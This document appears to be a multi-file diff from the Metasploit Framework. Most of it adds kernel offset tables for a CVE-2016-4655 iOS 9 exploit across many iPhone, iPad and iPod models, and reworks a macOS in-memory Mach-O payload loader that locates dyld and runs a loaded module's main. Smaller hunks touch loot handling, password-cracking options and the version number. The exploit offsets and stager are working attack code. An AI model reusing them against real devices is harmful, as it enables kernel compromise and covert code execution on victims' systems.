+        case iPhone53_iOS934: return 0x16;
+        case iPhone54_iOS910: return 0x16;
+        case iPhone54_iOS920: return 0x16;
+        case iPhone54_iOS921: return 0x16;
+        case iPhone54_iOS930: return 0x16;
+        case iPhone54_iOS931: return 0x16;
+        case iPhone54_iOS932: return 0x16;
+        case iPhone54_iOS933: return 0x16;
+        case iPhone54_iOS934: return 0x16;
+        case iPad21_iOS910: return 0x16;
+        case iPad21_iOS920: return 0x14;
+        case iPad21_iOS921: return 0x14;
+        case iPad21_iOS930: return 0x14;
+        case iPad21_iOS931: return 0x14;
+        case iPad21_iOS932: return 0x14;
+        case iPad21_iOS933: return 0x14;
+        case iPad21_iOS934: return 0x14;
+        case iPad22_iOS910: return 0x16;
+        case iPad22_iOS920: return 0x14;
+        case iPad22_iOS921: return 0x14;
+        case iPad22_iOS930: return 0x14;
+        case iPad22_iOS931: return 0x14;
+        case iPad22_iOS932: return 0x14;
+        case iPad22_iOS933: return 0x14;
+        case iPad22_iOS934: return 0x14;
+        case iPad23_iOS910: return 0x16;
+        case iPad23_iOS920: return 0x14;
+        case iPad23_iOS921: return 0x14;
+        case iPad23_iOS930: return 0x14;
+        case iPad23_iOS931: return 0x14;
+        case iPad23_iOS932: return 0x14;
+        case iPad23_iOS933: return 0x14;
+        case iPad23_iOS934: return 0x14;
+        case iPad24_iOS910: return 0x16;
+        case iPad24_iOS920: return 0x14;
+        case iPad24_iOS921: return 0x14;
+        case iPad24_iOS930: return 0x14;
+        case iPad24_iOS931: return 0x14;
+        case iPad24_iOS932: return 0x14;
+        case iPad24_iOS933: return 0x14;
+        case iPad24_iOS934: return 0x14;
+        case iPad25_iOS902: return 0x16;
+        case iPad31_iOS910: return 0x16;
+        case iPad31_iOS920: return 0x14;
+        case iPad31_iOS921: return 0x14;
+        case iPad31_iOS930: return 0x14;
+        case iPad31_iOS931: return 0x14;
+        case iPad31_iOS932: return 0x14;
+        case iPad31_iOS933: return 0x14;
+        case iPad31_iOS934: return 0x14;
+        case iPad32_iOS910: return 0x16;
+        case iPad32_iOS920: return 0x14;
+        case iPad32_iOS921: return 0x14;
+        case iPad32_iOS930: return 0x14;
+        case iPad32_iOS931: return 0x14;
+        case iPad32_iOS932: return 0x14;
+        case iPad32_iOS933: return 0x14;
+        case iPad32_iOS934: return 0x14;
+        case iPad33_iOS902: return 0x16;
+        case iPad33_iOS910: return 0x16;
+        case iPad33_iOS920: return 0x14;
+        case iPad33_iOS921: return 0x14;
+        case iPad33_iOS930: return 0x14;
+        case iPad33_iOS931: return 0x14;
+        case iPad33_iOS932: return 0x14;
+        case iPad33_iOS933: return 0x14;
+        case iPad33_iOS934: return 0x14;
+        case iPad34_iOS910: return 0x16;
+        case iPad34_iOS920: return 0x14;
+        case iPad34_iOS921: return 0x14;
+        case iPad34_iOS930: return 0x14;
+        case iPad34_iOS931: return 0x14;
+        case iPad34_iOS932: return 0x14;
+        case iPad34_iOS933: return 0x14;
+        case iPad34_iOS934: return 0x14;
+        case iPad35_iOS910: return 0x16;
+        case iPad35_iOS920: return 0x14;
+        case iPad35_iOS921: return 0x14;
+        case iPad35_iOS930: return 0x14;
+        case iPad35_iOS931: return 0x14;
+        case iPad35_iOS932: return 0x14;
+        case iPad35_iOS933: return 0x14;
+        case iPad35_iOS934: return 0x14;
+        case iPad36_iOS910: return 0x16;
+        case iPad36_iOS920: return 0x14;
+        case iPad36_iOS921: return 0x14;
+        case iPad36_iOS930: return 0x14;
+        case iPad36_iOS931: return 0x14;
+        case iPad36_iOS932: return 0x14;
+        case iPad36_iOS933: return 0x14;
+        case iPad36_iOS934: return 0x14;
+        case iPod51_iOS910: return 0x16;
+        case iPod51_iOS920: return 0x14;
+        case iPod51_iOS921: return 0x14;
+        case iPod51_iOS930: return 0x14;
+        case iPod51_iOS931: return 0x14;
+        case iPod51_iOS932: return 0x14;
+        case iPod51_iOS933: return 0x14;
+        case iPod51_iOS934: return 0x14;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_posix_check(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x40;
+        case iPhone41_iOS910: return 0x3e;
+        case iPhone41_iOS920: return 0x3e;
+        case iPhone41_iOS921: return 0x3e;
+        case iPhone41_iOS930: return 0x3e;
+        case iPhone41_iOS931: return 0x3e;
+        case iPhone41_iOS932: return 0x3e;
+        case iPhone41_iOS933: return 0x3e;
+        case iPhone41_iOS934: return 0x3e;
+        case iPhone51_iOS910: return 0x3e;
+        case iPhone51_iOS920: return 0x3e;
+        case iPhone51_iOS921: return 0x3e;
+        case iPhone51_iOS930: return 0x3e;
+        case iPhone51_iOS931: return 0x3e;
+        case iPhone51_iOS932: return 0x3e;
+        case iPhone51_iOS933: return 0x3e;
+        case iPhone51_iOS934: return 0x3e;
+        case iPhone52_iOS902: return 0x40;
+        case iPhone52_iOS910: return 0x3e;
+        case iPhone52_iOS920: return 0x3e;
+        case iPhone52_iOS921: return 0x3e;
+        case iPhone52_iOS930: return 0x3e;
+        case iPhone52_iOS931: return 0x3e;
+        case iPhone52_iOS932: return 0x3e;
+        case iPhone52_iOS933: return 0x3e;
+        case iPhone52_iOS934: return 0x3e;
+        case iPhone53_iOS910: return 0x3e;
+        case iPhone53_iOS920: return 0x3e;
+        case iPhone53_iOS921: return 0x3e;
+        case iPhone53_iOS930: return 0x3e;
+        case iPhone53_iOS931: return 0x3e;
+        case iPhone53_iOS932: return 0x3e;
+        case iPhone53_iOS933: return 0x3e;
+        case iPhone53_iOS934: return 0x3e;
+        case iPhone54_iOS910: return 0x3e;
+        case iPhone54_iOS920: return 0x3e;
+        case iPhone54_iOS921: return 0x3e;
+        case iPhone54_iOS930: return 0x3e;
+        case iPhone54_iOS931: return 0x3e;
+        case iPhone54_iOS932: return 0x3e;
+        case iPhone54_iOS933: return 0x3e;
+        case iPhone54_iOS934: return 0x3e;
+        case iPad21_iOS910: return 0x40;
+        case iPad21_iOS920: return 0x3e;
+        case iPad21_iOS921: return 0x3e;
+        case iPad21_iOS930: return 0x3e;
+        case iPad21_iOS931: return 0x3e;
+        case iPad21_iOS932: return 0x3e;
+        case iPad21_iOS933: return 0x3e;
+        case iPad21_iOS934: return 0x3e;
+        case iPad22_iOS910: return 0x40;
+        case iPad22_iOS920: return 0x3e;
+        case iPad22_iOS921: return 0x3e;
+        case iPad22_iOS930: return 0x3e;
+        case iPad22_iOS931: return 0x3e;
+        case iPad22_iOS932: return 0x3e;
+        case iPad22_iOS933: return 0x3e;
+        case iPad22_iOS934: return 0x3e;
+        case iPad23_iOS910: return 0x40;
+        case iPad23_iOS920: return 0x3e;
+        case iPad23_iOS921: return 0x3e;
+        case iPad23_iOS930: return 0x3e;
+        case iPad23_iOS931: return 0x3e;
+        case iPad23_iOS932: return 0x3e;
+        case iPad23_iOS933: return 0x3e;
+        case iPad23_iOS934: return 0x3e;
+        case iPad24_iOS910: return 0x40;
+        case iPad24_iOS920: return 0x3e;
+        case iPad24_iOS921: return 0x3e;
+        case iPad24_iOS930: return 0x3e;
+        case iPad24_iOS931: return 0x3e;
+        case iPad24_iOS932: return 0x3e;
+        case iPad24_iOS933: return 0x3e;
+        case iPad24_iOS934: return 0x3e;
+        case iPad25_iOS902: return 0x40;
+        case iPad31_iOS910: return 0x40;
+        case iPad31_iOS920: return 0x3e;
+        case iPad31_iOS921: return 0x3e;
+        case iPad31_iOS930: return 0x3e;
+        case iPad31_iOS931: return 0x3e;
+        case iPad31_iOS932: return 0x3e;
+        case iPad31_iOS933: return 0x3e;
+        case iPad31_iOS934: return 0x3e;
+        case iPad32_iOS910: return 0x40;
+        case iPad32_iOS920: return 0x3e;
+        case iPad32_iOS921: return 0x3e;
+        case iPad32_iOS930: return 0x3e;
+        case iPad32_iOS931: return 0x3e;
+        case iPad32_iOS932: return 0x3e;
+        case iPad32_iOS933: return 0x3e;
+        case iPad32_iOS934: return 0x3e;
+        case iPad33_iOS902: return 0x40;
+        case iPad33_iOS910: return 0x40;
+        case iPad33_iOS920: return 0x3e;
+        case iPad33_iOS921: return 0x3e;
+        case iPad33_iOS930: return 0x3e;
+        case iPad33_iOS931: return 0x3e;
+        case iPad33_iOS932: return 0x3e;
+        case iPad33_iOS933: return 0x3e;
+        case iPad33_iOS934: return 0x3e;
+        case iPad34_iOS910: return 0x40;
+        case iPad34_iOS920: return 0x3e;
+        case iPad34_iOS921: return 0x3e;
+        case iPad34_iOS930: return 0x3e;
+        case iPad34_iOS931: return 0x3e;
+        case iPad34_iOS932: return 0x3e;
+        case iPad34_iOS933: return 0x3e;
+        case iPad34_iOS934: return 0x3e;
+        case iPad35_iOS910: return 0x40;
+        case iPad35_iOS920: return 0x3e;
+        case iPad35_iOS921: return 0x3e;
+        case iPad35_iOS930: return 0x3e;
+        case iPad35_iOS931: return 0x3e;
+        case iPad35_iOS932: return 0x3e;
+        case iPad35_iOS933: return 0x3e;
+        case iPad35_iOS934: return 0x3e;
+        case iPad36_iOS910: return 0x40;
+        case iPad36_iOS920: return 0x3e;
+        case iPad36_iOS921: return 0x3e;
+        case iPad36_iOS930: return 0x3e;
+        case iPad36_iOS931: return 0x3e;
+        case iPad36_iOS932: return 0x3e;
+        case iPad36_iOS933: return 0x3e;
+        case iPad36_iOS934: return 0x3e;
+        case iPod51_iOS910: return 0x40;
+        case iPod51_iOS920: return 0x3e;
+        case iPod51_iOS921: return 0x3e;
+        case iPod51_iOS930: return 0x3e;
+        case iPod51_iOS931: return 0x3e;
+        case iPod51_iOS932: return 0x3e;
+        case iPod51_iOS933: return 0x3e;
+        case iPod51_iOS934: return 0x3e;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_mac_proc_check(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x224;
+        case iPhone41_iOS910: return 0x224;
+        case iPhone41_iOS920: return 0x1e6;
+        case iPhone41_iOS921: return 0x1e6;
+        case iPhone41_iOS930: return 0x1e6;
+        case iPhone41_iOS931: return 0x1e6;
+        case iPhone41_iOS932: return 0x1e6;
+        case iPhone41_iOS933: return 0x1e6;
+        case iPhone41_iOS934: return 0x1e6;
+        case iPhone51_iOS910: return 0x1e6;
+        case iPhone51_iOS920: return 0x1e6;
+        case iPhone51_iOS921: return 0x1e6;
+        case iPhone51_iOS930: return 0x1e6;
+        case iPhone51_iOS931: return 0x1e6;
+        case iPhone51_iOS932: return 0x1e6;
+        case iPhone51_iOS933: return 0x1e6;
+        case iPhone51_iOS934: return 0x1e6;
+        case iPhone52_iOS902: return 0x224;
+        case iPhone52_iOS910: return 0x1e6;
+        case iPhone52_iOS920: return 0x1e6;
+        case iPhone52_iOS921: return 0x1e6;
+        case iPhone52_iOS930: return 0x1e6;
+        case iPhone52_iOS931: return 0x1e6;
+        case iPhone52_iOS932: return 0x1e6;
+        case iPhone52_iOS933: return 0x1e6;
+        case iPhone52_iOS934: return 0x1e6;
+        case iPhone53_iOS910: return 0x1e6;
+        case iPhone53_iOS920: return 0x1e6;
+        case iPhone53_iOS921: return 0x1e6;
+        case iPhone53_iOS930: return 0x1e6;
+        case iPhone53_iOS931: return 0x1e6;
+        case iPhone53_iOS932: return 0x1e6;
+        case iPhone53_iOS933: return 0x1e6;
+        case iPhone53_iOS934: return 0x1e6;
+        case iPhone54_iOS910: return 0x1e6;
+        case iPhone54_iOS920: return 0x1e6;
+        case iPhone54_iOS921: return 0x1e6;
+        case iPhone54_iOS930: return 0x1e6;
+        case iPhone54_iOS931: return 0x1e6;
+        case iPhone54_iOS932: return 0x1e6;
+        case iPhone54_iOS933: return 0x1e6;
+        case iPhone54_iOS934: return 0x1e6;
+        case iPad21_iOS910: return 0x224;
+        case iPad21_iOS920: return 0x1e6;
+        case iPad21_iOS921: return 0x1e6;
+        case iPad21_iOS930: return 0x1e6;
+        case iPad21_iOS931: return 0x1e6;
+        case iPad21_iOS932: return 0x1e6;
+        case iPad21_iOS933: return 0x1e6;
+        case iPad21_iOS934: return 0x1e6;
+        case iPad22_iOS910: return 0x224;
+        case iPad22_iOS920: return 0x1e6;
+        case iPad22_iOS921: return 0x1e6;
+        case iPad22_iOS930: return 0x1e6;
+        case iPad22_iOS931: return 0x1e6;
+        case iPad22_iOS932: return 0x1e6;
+        case iPad22_iOS933: return 0x1e6;
+        case iPad22_iOS934: return 0x1e6;
+        case iPad23_iOS910: return 0x224;
+        case iPad23_iOS920: return 0x1e6;
+        case iPad23_iOS921: return 0x1e6;
+        case iPad23_iOS930: return 0x1e6;
+        case iPad23_iOS931: return 0x1e6;
+        case iPad23_iOS932: return 0x1e6;
+        case iPad23_iOS933: return 0x1e6;
+        case iPad23_iOS934: return 0x1e6;
+        case iPad24_iOS910: return 0x224;
+        case iPad24_iOS920: return 0x1e6;
+        case iPad24_iOS921: return 0x1e6;
+        case iPad24_iOS930: return 0x1e6;
+        case iPad24_iOS931: return 0x1e6;
+        case iPad24_iOS932: return 0x1e6;
+        case iPad24_iOS933: return 0x1e6;
+        case iPad24_iOS934: return 0x1e6;
+        case iPad25_iOS902: return 0x224;
+        case iPad31_iOS910: return 0x224;
+        case iPad31_iOS920: return 0x1e6;
+        case iPad31_iOS921: return 0x1e6;
+        case iPad31_iOS930: return 0x1e6;
+        case iPad31_iOS931: return 0x1e6;
+        case iPad31_iOS932: return 0x1e6;
+        case iPad31_iOS933: return 0x1e6;
+        case iPad31_iOS934: return 0x1e6;
+        case iPad32_iOS910: return 0x224;
+        case iPad32_iOS920: return 0x1e6;
+        case iPad32_iOS921: return 0x1e6;
+        case iPad32_iOS930: return 0x1e6;
+        case iPad32_iOS931: return 0x1e6;
+        case iPad32_iOS932: return 0x1e6;
+        case iPad32_iOS933: return 0x1e6;
+        case iPad32_iOS934: return 0x1e6;
+        case iPad33_iOS902: return 0x224;
+        case iPad33_iOS910: return 0x224;
+        case iPad33_iOS920: return 0x1e6;
+        case iPad33_iOS921: return 0x1e6;
+        case iPad33_iOS930: return 0x1e6;
+        case iPad33_iOS931: return 0x1e6;
+        case iPad33_iOS932: return 0x1e6;
+        case iPad33_iOS933: return 0x1e6;
+        case iPad33_iOS934: return 0x1e6;
+        case iPad34_iOS910: return 0x224;
+        case iPad34_iOS920: return 0x1e6;
+        case iPad34_iOS921: return 0x1e6;
+        case iPad34_iOS930: return 0x1e6;
+        case iPad34_iOS931: return 0x1e6;
+        case iPad34_iOS932: return 0x1e6;
+        case iPad34_iOS933: return 0x1e6;
+        case iPad34_iOS934: return 0x1e6;
+        case iPad35_iOS910: return 0x224;
+        case iPad35_iOS920: return 0x1e6;
+        case iPad35_iOS921: return 0x1e6;
+        case iPad35_iOS930: return 0x1e6;
+        case iPad35_iOS931: return 0x1e6;
+        case iPad35_iOS932: return 0x1e6;
+        case iPad35_iOS933: return 0x1e6;
+        case iPad35_iOS934: return 0x1e6;
+        case iPad36_iOS910: return 0x224;
+        case iPad36_iOS920: return 0x1e6;
+        case iPad36_iOS921: return 0x1e6;
+        case iPad36_iOS930: return 0x1e6;
+        case iPad36_iOS931: return 0x1e6;
+        case iPad36_iOS932: return 0x1e6;
+        case iPad36_iOS933: return 0x1e6;
+        case iPad36_iOS934: return 0x1e6;
+        case iPod51_iOS910: return 0x224;
+        case iPod51_iOS920: return 0x1e6;
+        case iPod51_iOS921: return 0x1e6;
+        case iPod51_iOS930: return 0x1e6;
+        case iPod51_iOS931: return 0x1e6;
+        case iPod51_iOS932: return 0x1e6;
+        case iPod51_iOS933: return 0x1e6;
+        case iPod51_iOS934: return 0x1e6;
+        default: return 0;
+    }
+}
+
+/*r2 -q kcache/kernelcache.bin -c "is" | grep memcmp*/
+/*3588 0x000c3c80 0x800c4c80 GLOBAL   FUNC    0 _memcmp*/
+static inline unsigned int find_memcmp(void) {
+    switch (target_environment) {
+        case iPhone41_iOS934: return 0x000c085c;
+        case iPhone41_iOS933: return 0x000c085c;
+        case iPhone41_iOS932: return 0x000c08ec;
+        case iPhone41_iOS930: return 0x000c08dc;
+        case iPhone41_iOS921: return 0x000bfd7c;
+        case iPhone41_iOS920: return 0x000bfd2c;
+        case iPhone41_iOS910: return 0x000c1340;
+        case iPhone41_iOS902: return 0x000c11d0;
+        case iPhone51_iOS934: return 0x000c3e10;
+        case iPhone51_iOS933: return 0x000c3e10;
+        case iPhone51_iOS932: return 0x000c3c80;
+        case iPhone51_iOS930: return 0x000c3c90;
+        case iPhone51_iOS921: return 0x000c2ff0;
+        case iPhone51_iOS920: return 0x000c2fb0;
+        case iPhone51_iOS910: return 0x000c42c4;
+        /*case iPhone51_iOS902: return 0x000c4124;*/
+        case iPhone52_iOS934: return 0x000c3e10;
+        case iPhone52_iOS933: return 0x000c3e10;
+        case iPhone52_iOS932: return 0x000c3c80;
+        case iPhone52_iOS930: return 0x000c3c90;
+        case iPhone52_iOS921: return 0x000c2ff0;
+        case iPhone52_iOS920: return 0x000c2fb0;
+        case iPhone52_iOS910: return 0x000c42c4;
+        case iPhone52_iOS902: return 0x000c4124;
+        case iPhone53_iOS934: return 0x000c3e10;
+        case iPhone53_iOS933: return 0x000c3e10;
+        case iPhone53_iOS932: return 0x000c3c80;
+        case iPhone53_iOS930: return 0x000c3c90;
+        case iPhone53_iOS921: return 0x000c2ff0;
+        case iPhone53_iOS920: return 0x000c2fb0;
+        case iPhone53_iOS910: return 0x000c42c4;
+        /*case iPhone53_iOS902: return 0x000c4124;*/
+        case iPhone54_iOS934: return 0x000c3e10;
+        case iPhone54_iOS933: return 0x000c3e10;
+        case iPhone54_iOS932: return 0x000c3c80;
+        case iPhone54_iOS930: return 0x000c3c90;
+        case iPhone54_iOS921: return 0x000c2ff0;
+        case iPhone54_iOS920: return 0x000c2fb0;
+        case iPhone54_iOS910: return 0x000c42c4;
+        /*case iPhone54_iOS902: return 0x000c4124;*/
+        case iPad21_iOS934: return 0x000c085c;
+        case iPad21_iOS933: return 0x000c085c;
+        case iPad21_iOS932: return 0x000c08ec;
+        case iPad21_iOS930: return 0x000c08dc;
+        case iPad21_iOS921: return 0x000bfd7c;
+        case iPad21_iOS920: return 0x000bfd2c;
+        case iPad21_iOS910: return 0x000c1340;
+        /*case iPad21_iOS902: return 0x000c11d0;*/
+        case iPad22_iOS934: return 0x000c085c;
+        case iPad22_iOS933: return 0x000c085c;
+        case iPad22_iOS932: return 0x000c08ec;
+        case iPad22_iOS930: return 0x000c08dc;
+        case iPad22_iOS921: return 0x000bfd7c;
+        case iPad22_iOS920: return 0x000bfd2c;
+        case iPad22_iOS910: return 0x000c1340;
+        /*case iPad22_iOS902: return 0x000c11d0;*/
+        case iPad23_iOS934: return 0x000c085c;
+        case iPad23_iOS933: return 0x000c085c;
+        case iPad23_iOS932: return 0x000c08ec;
+        case iPad23_iOS930: return 0x000c08dc;
+        case iPad23_iOS921: return 0x000bfd7c;
+        case iPad23_iOS920: return 0x000bfd2c;
+        case iPad23_iOS910: return 0x000c1340;
+        /*case iPad23_iOS902: return 0x000c11d0;*/
+        case iPad24_iOS934: return 0x000c085c;
+        case iPad24_iOS933: return 0x000c085c;
+        case iPad24_iOS932: return 0x000c08ec;
+        case iPad24_iOS930: return 0x000c08dc;
+        case iPad24_iOS921: return 0x000bfd7c;
+        case iPad24_iOS920: return 0x000bfd2c;
+        case iPad24_iOS910: return 0x000c1340;
+        /*case iPad24_iOS902: return 0x000c11d0;*/
+        case iPad31_iOS934: return 0x000c085c;
+        case iPad31_iOS933: return 0x000c085c;
+        case iPad31_iOS932: return 0x000c08ec;
+        case iPad31_iOS930: return 0x000c08dc;
+        case iPad31_iOS921: return 0x000bfd7c;
+        case iPad31_iOS920: return 0x000bfd2c;
+        case iPad31_iOS910: return 0x000c1340;
+        /*case iPad31_iOS902: return 0x000c11d0;*/
+        case iPad32_iOS934: return 0x000c085c;
+        case iPad32_iOS933: return 0x000c085c;
+        case iPad32_iOS932: return 0x000c08ec;
+        case iPad32_iOS930: return 0x000c08dc;
+        case iPad32_iOS921: return 0x000bfd7c;
+        case iPad32_iOS920: return 0x000bfd2c;
+        case iPad32_iOS910: return 0x000c1340;
+        /*case iPad32_iOS902: return 0x000c11d0;*/
+        case iPad33_iOS934: return 0x000c085c;
+        case iPad33_iOS933: return 0x000c085c;
+        case iPad33_iOS932: return 0x000c08ec;
+        case iPad33_iOS930: return 0x000c08dc;
+        case iPad33_iOS921: return 0x000bfd7c;
+        case iPad33_iOS920: return 0x000bfd2c;
+        case iPad33_iOS910: return 0x000c1340;
+        /*case iPad33_iOS902: return 0x000c11d0;*/
+        case iPad34_iOS934: return 0x000c3e10;
+        case iPad34_iOS933: return 0x000c3e10;
+        case iPad34_iOS932: return 0x000c3c80;
+        case iPad34_iOS930: return 0x000c3c90;
+        case iPad34_iOS921: return 0x000c2ff0;
+        case iPad34_iOS920: return 0x000c2fb0;
+        case iPad34_iOS910: return 0x000c42c4;
+        /*case iPad34_iOS902: return 0x000c4124;*/
+        case iPad35_iOS934: return 0x000c3e10;
+        case iPad35_iOS933: return 0x000c3e10;
+        case iPad35_iOS932: return 0x000c3c80;
+        case iPad35_iOS930: return 0x000c3c90;
+        case iPad35_iOS921: return 0x000c2ff0;
+        case iPad35_iOS920: return 0x000c2fb0;
+        case iPad35_iOS910: return 0x000c42c4;
+        /*case iPad35_iOS902: return 0x000c4124;*/
+        case iPad36_iOS934: return 0x000c3e10;
+        case iPad36_iOS933: return 0x000c3e10;
+        case iPad36_iOS932: return 0x000c3c80;
+        case iPad36_iOS930: return 0x000c3c90;
+        case iPad36_iOS921: return 0x000c2ff0;
+        case iPad36_iOS920: return 0x000c2fb0;
+        case iPad36_iOS910: return 0x000c42c4;
+        /*case iPad36_iOS902: return 0x000c4124;*/
+        case iPod51_iOS934: return 0x000c085c;
+        case iPod51_iOS933: return 0x000c085c;
+        case iPod51_iOS932: return 0x000c08ec;
+        case iPod51_iOS930: return 0x000c08dc;
+        case iPod51_iOS921: return 0x000bfd7c;
+        case iPod51_iOS920: return 0x000bfd2c;
+        case iPod51_iOS910: return 0x000c1340;
+        /*case iPod51_iOS902: return 0x000c11d0;*/
+        default: return 0;
+    }
+}
+
@@ -1,10 +0,0 @@
-#!/bin/bash
-
-make clean
-rsync -azPr -e "ssh -p2222" --delete . localhost:rsync/cve/
-ssh -p2222 localhost "bash -l -c 'cd rsync/cve && make main_vm' && echo Done!"
-rsync -azPr -e "ssh -p2222" --delete localhost:rsync/cve/ .
-ls -l main_vm
-cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit
-
-
@@ -20,9 +20,11 @@
 typedef NSObjectFileImageReturnCode (*NSCreateObjectFileImageFromMemory_ptr)(void *address, unsigned long size, NSObjectFileImage *objectFileImage);
 typedef NSModule (*NSLinkModule_ptr)(NSObjectFileImage objectFileImage, const char* moduleName, unsigned long options);

-uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer);
+typedef NSSymbol (*NSLookupSymbolInModule_ptr)(NSModule module, const char *symbolName);
+typedef void * (*NSAddressOfSymbol_ptr)(NSSymbol symbol);
+
+uint64_t find_macho(uint64_t addr, unsigned int increment);
 uint64_t find_symbol(uint64_t base, char* symbol);
-uint64_t find_entry_offset(struct mach_header_64 *mh);
 int string_compare(const char* s1, const char* s2);
 int detect_sierra();

@@ -52,20 +54,24 @@ int main(int argc, char** argv)
  int sierra = detect_sierra();
  uint64_t binary = DYLD_BASE_ADDR;
  if (sierra) {
-    binary = find_macho(0x100000000, 0x1000, 0);
+    binary = find_macho(0x100000000, 0x1000);
    if (!binary) {
      return 1;
    }
    binary += 0x1000;
  }
-  uint64_t dyld = find_macho(binary, 0x1000, 0);
+  uint64_t dyld = find_macho(binary, 0x1000);
  if (!dyld) {
    return 1;
  }

  NSCreateObjectFileImageFromMemory_ptr NSCreateObjectFileImageFromMemory_func = (void*)find_symbol(dyld, "_NSCreateObjectFileImageFromMemory");
  if (!NSCreateObjectFileImageFromMemory_func) {
-    return 1;
+    dyld = find_macho(dyld + 0x1000, 0x1000);
+    NSCreateObjectFileImageFromMemory_func = (void*)find_symbol(dyld, "_NSCreateObjectFileImageFromMemory");
+    if (!NSCreateObjectFileImageFromMemory_func) {
+      return 1;
+    }
  } 
 #ifdef DEBUG
  print("good symbol!\n");
@@ -76,9 +82,21 @@ int main(int argc, char** argv)
    return 1;
  } 

+  NSLookupSymbolInModule_ptr NSLookupSymbolInModule_func = (void*)find_symbol(dyld, "_NSLookupSymbolInModule");
+  if (!NSLookupSymbolInModule_func) {
+    return 1;
+  }
+
+  NSAddressOfSymbol_ptr NSAddressOfSymbol_func = (void*)find_symbol(dyld, "_NSAddressOfSymbol");
+  if (!NSAddressOfSymbol_func) {
+    return 1;
+  }
+
  if (!sierra) {
    NSCreateObjectFileImageFromMemory_func -= DYLD_BASE_ADDR;
    NSLinkModule_func -= DYLD_BASE_ADDR;
+    NSLookupSymbolInModule_func -= DYLD_BASE_ADDR;
+    NSAddressOfSymbol_func -= DYLD_BASE_ADDR;
  }

  /*if (*(char*)buffer == 'b') {*/
@@ -106,15 +124,21 @@ int main(int argc, char** argv)
  print("good nm!\n");
 #endif

-  uint64_t execute_base = (uint64_t)nm;
-  execute_base = find_macho(execute_base, sizeof(int), 1);
-
-  uint64_t entry_off = find_entry_offset((void*)execute_base);
-  if (!entry_off) {
+  NSSymbol sym_main = NSLookupSymbolInModule_func(nm, "_main");
+  if (!sym_main) {
    return 1;
  }
-  uint64_t entry = (execute_base + entry_off);
-  int(*main_func)(int, char**) = (int(*)(int, char**))entry;
+
+  void * addr_main = NSAddressOfSymbol_func(sym_main);
+  if (!addr_main) {
+    return 1;
+  }
+
+#ifdef DEBUG
+  print("found main!\n");
+#endif
+
+  int(*main_func)(int, char**) = (int(*)(int, char**))addr_main;
  char* socket = (char*)(size_t)argc;
  char *new_argv[] = { "m", socket, NULL };
  int new_argc = 2;
@@ -187,13 +211,10 @@ uint64_t syscall_chmod(uint64_t path, long mode)
  return ret;
 }

-uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer) 
+uint64_t find_macho(uint64_t addr, unsigned int increment)
 {
  while(1) {
    uint64_t ptr = addr;
-    if (pointer) {
-      ptr = *(uint64_t *)ptr;
-    }
    unsigned long ret = syscall_chmod(ptr, 0777);
    if (ret == 0x2 && ((int *)ptr)[0] == MH_MAGIC_64) {
      return ptr;
@@ -204,22 +225,6 @@ uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer)
  return 0;
 }

-uint64_t find_entry_offset(struct mach_header_64 *mh)
-{
-  struct entry_point_command *entry;
-  struct load_command *lc = (struct load_command *)((void*)mh + sizeof(struct mach_header_64));
-  for (int i=0; i<mh->ncmds; i++) {
-    if (lc->cmd == LC_MAIN) {
-      entry = (struct entry_point_command *)lc;
-      return entry->entryoff;
-    }
-
-    lc = (struct load_command *)((unsigned long)lc + lc->cmdsize);
-  }
-
-  return 0;
-}
-
 int string_compare(const char* s1, const char* s2) 
 {
  while (*s1 != '\0' && *s1 == *s2)
@@ -8,16 +8,22 @@ module RemoteLootDataService

  def loot(opts = {})
    path = get_path_select(opts, LOOT_API_PATH)
-    # TODO: Add an option to toggle whether the file data is returned or not
-    loots = json_to_mdm_object(self.get_data(path, nil, opts), LOOT_MDM_CLASS, [])
-    # Save a local copy of the file
-    loots.each do |loot|
-      if loot.data
-        local_path = File.join(Msf::Config.loot_directory, File.basename(loot.path))
-        loot.path = process_file(loot.data, local_path)
+    data = self.get_data(path, nil, opts)
+    rv = json_to_mdm_object(data, LOOT_MDM_CLASS, [])
+    parsed_body = JSON.parse(data.response.body, symbolize_names: true)
+    data = parsed_body[:data]
+    data.each do |loot|
+      # TODO: Add an option to toggle whether the file data is returned or not
+      if loot[:data] && !loot[:data].empty?
+        local_path = File.join(Msf::Config.loot_directory, File.basename(loot[:path]))
+        rv[data.index(loot)].path = process_file(loot[:data], local_path)
+      end
+      if loot[:host]
+        host_object = to_ar(RemoteHostDataService::HOST_MDM_CLASS.constantize, loot[:host])
+        rv[data.index(loot)].host = host_object
      end
    end
-    loots
+    rv
  end

  def report_loot(opts)
@@ -36,6 +36,10 @@ module Metasploit
        #   @return [Integer] An optional maximum duration of the cracking attempt in seconds
        attr_accessor :max_runtime

+        # @!attribute max_length
+        #   @return [Integer] An optional maximum length of password to attempt cracking
+        attr_accessor :max_length
+
        # @!attribute pot
        #   @return [String] The file path to an alternative John pot file to use
        attr_accessor :pot
@@ -62,6 +66,12 @@ module Metasploit
                      greater_than_or_equal_to: 0
                  }, if: 'max_runtime.present?'

+        validates :max_length,
+                  numericality: {
+                      only_integer:             true,
+                      greater_than_or_equal_to: 0
+                  }, if: 'max_length.present?'
+
        validates :wordlist, :'Metasploit::Framework::File_path' => true, if: 'wordlist.present?'

        # @param attributes [Hash{Symbol => String,nil}]
@@ -146,6 +156,10 @@ module Metasploit
            cmd << ( "--max-run-time=" + max_runtime.to_s)
          end

+          if max_length.present?
+            cmd << ( "--max-len=" + max_length.to_s)
+          end
+
          cmd << hash_path
        end

@@ -165,7 +179,7 @@ module Metasploit
        #
        # @return [String] the path to the default john.conf file
        def john_config_file
-          ::File.join( ::Msf::Config.data_directory, "john.conf" )
+          ::File.join( ::Msf::Config.data_directory, "jtr", "john.conf" )
        end

        # This method returns the path to a default john.pot file.
@@ -204,9 +218,6 @@ module Metasploit

        private

-
-
-
      end

    end
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "5.0.2"
+      VERSION = "5.0.6"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -652,7 +652,7 @@ protected
        user_output.print(shell_read)
      end
      if sd[0].include? user_input.fd
-        run_single(user_input.gets)
+        run_single((user_input.gets || '').chomp("\n"))
      end
      Thread.pass
    end
